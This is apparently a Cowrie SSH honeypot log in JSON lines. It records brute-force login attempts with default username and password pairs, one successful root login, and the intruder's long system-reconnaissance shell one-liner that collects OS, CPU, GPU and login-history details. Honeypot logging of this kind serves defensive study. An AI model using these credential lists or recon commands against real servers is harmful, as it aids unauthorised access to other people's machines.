{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:20.432381Z","src_ip":"212.227.235.229","session":"8265df2c4c04"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T04:57:20.530731Z","src_ip":"212.227.235.229","session":"8265df2c4c04"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:20.831837Z","src_ip":"212.227.235.229","session":"8265df2c4c04"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:21.934108Z","src_ip":"212.227.235.229","session":"8265df2c4c04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"24.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 24.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:22.382849Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46030,"dst_ip":"1.2.3.4","dst_port":22,"session":"4610c250141d","protocol":"ssh","message":"New connection: 212.227.235.229:46030 (1.2.3.4:22) [session: 4610c250141d]","sensor":"my-vps","timestamp":"2025-08-31T04:57:22.761581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:57:22.925426Z","src_ip":"212.227.235.229","session":"4610c250141d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:57:23.010239Z","src_ip":"212.227.235.229","session":"4610c250141d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:25.102827Z","src_ip":"212.227.235.229","session":"f34f52c6b0ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:57:25.103643Z","src_ip":"212.227.235.229","session":"f34f52c6b0ee"}
{"eventid":"cowrie.login.failed","username":"proftpd","password":"proftpd","message":"login attempt [proftpd/proftpd] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:25.502909Z","src_ip":"212.227.235.229","session":"4610c250141d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41032,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb13426ebc8b","protocol":"ssh","message":"New connection: 212.227.235.229:41032 (1.2.3.4:22) [session: fb13426ebc8b]","sensor":"my-vps","timestamp":"2025-08-31T04:57:26.077936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:57:26.078654Z","src_ip":"212.227.235.229","session":"fb13426ebc8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:57:26.354874Z","src_ip":"212.227.235.229","session":"fb13426ebc8b"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"password","message":"login attempt [sammy/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:27.502710Z","src_ip":"212.227.235.229","session":"fb13426ebc8b"}
{"eventid":"cowrie.session.closed","duration":"122.2","message":"Connection lost after 122.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:27.784858Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46302,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8068343576d","protocol":"ssh","message":"New connection: 212.227.235.229:46302 (1.2.3.4:22) [session: e8068343576d]","sensor":"my-vps","timestamp":"2025-08-31T04:57:27.851354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:57:27.853447Z","src_ip":"212.227.235.229","session":"e8068343576d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:57:28.107295Z","src_ip":"212.227.235.229","session":"e8068343576d"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:28.424790Z","src_ip":"212.227.235.229","session":"4610c250141d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:28.780468Z","src_ip":"212.227.235.229","session":"fb13426ebc8b"}
{"eventid":"cowrie.login.failed","username":"exx","password":"exxact@1","message":"login attempt [exx/exxact@1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:29.124289Z","src_ip":"212.227.235.229","session":"e8068343576d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:30.384292Z","src_ip":"212.227.235.229","session":"e8068343576d"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T04:57:39.848737Z","src_ip":"212.227.125.160","session":"89330c866942"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46028,"dst_ip":"1.2.3.4","dst_port":22,"session":"60e616dc954a","protocol":"ssh","message":"New connection: 212.227.235.229:46028 (1.2.3.4:22) [session: 60e616dc954a]","sensor":"my-vps","timestamp":"2025-08-31T04:57:40.691604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:57:41.416612Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:57:41.417307Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54208,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d290a7dbca9","protocol":"ssh","message":"New connection: 212.227.125.160:54208 (1.2.3.4:22) [session: 2d290a7dbca9]","sensor":"my-vps","timestamp":"2025-08-31T04:57:43.617365Z"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:57:47.054015Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:57:48.685097Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.685777Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.686411Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.687401Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.688773Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.689664Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.690370Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.691206Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.691770Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.692334Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.692873Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.693533Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:57:48.694093Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:57:49.425154Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:49.426024Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:57:49.427136Z","src_ip":"212.227.235.229","session":"60e616dc954a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48440,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb5c735720f9","protocol":"ssh","message":"New connection: 212.227.235.229:48440 (1.2.3.4:22) [session: eb5c735720f9]","sensor":"my-vps","timestamp":"2025-08-31T04:57:52.931750Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42772,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcf9269a320b","protocol":"ssh","message":"New connection: 212.227.235.229:42772 (1.2.3.4:22) [session: bcf9269a320b]","sensor":"my-vps","timestamp":"2025-08-31T04:57:53.157452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:57:53.158652Z","src_ip":"212.227.235.229","session":"bcf9269a320b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:57:53.161252Z","src_ip":"212.227.235.229","session":"eb5c735720f9"}
